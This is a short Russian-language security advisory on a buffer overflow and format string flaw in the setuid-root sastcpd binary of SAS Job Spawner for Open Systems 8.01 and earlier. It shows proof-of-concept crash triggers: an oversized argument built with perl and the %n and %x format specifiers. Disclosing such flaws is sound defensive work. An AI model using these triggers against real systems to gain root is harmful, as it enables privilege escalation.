Переполнение буфера и уязвимость форматной строки в SAS Job Spawner for Open Systems

Программное обеспечение SAS обеспечивает основу, инструментальные средства, и решения к анализу данных, порождению сообщений, и поставке информации в масштабах предприятия.
"SAS Job Spawner", sastcpd, содержит переполнение буфера и уязвимость форматной строки. Так как sastcpd по умолчанию установлен как setuid root, то успешная эксплуатация этой уязвимости может привести к получению root привелегий.
Уязвимость найдена в SaS Job Spawner for Open Systems 8.01 и более ранние.

Пример:
$ sastcpd `perl -e "print 'A' x 1200"`
Invalid argument: AAAA[..cut..]AAAA.
Segmentation fault (core dumped)
$ ls -la core
-rw------- 1 root teknix 1454382 Jan 28 04:22 core
$ sastcpd %n
Segmentation fault (core dumped)
$ sastcpd %x
Invalid argument: 2.